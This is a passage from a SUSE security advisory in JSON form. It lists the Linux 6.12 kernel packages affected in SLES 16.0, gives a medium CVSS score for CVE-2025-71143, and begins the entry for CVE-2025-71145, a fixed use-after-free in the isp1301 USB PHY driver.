"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71143"
},
{
"cve": "CVE-2025-71145",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71145"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: phy: isp1301: fix non-OF device reference imbalance\n\nA recent change fixing a device reference leak in a UDC driver\nintroduced a potential use-after-free in the non-OF case as the\nisp1301_get_client() helper only increases the reference count for the\nreturned I2C device in the OF case.\n\nIncrement the reference count also for non-OF so that the caller can\ndecrement it unconditionally.\n\nNote that this is inherently racy just as using the returned I2C device\nis since nothing is preventing the PHY driver from being unbound while\nin use.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
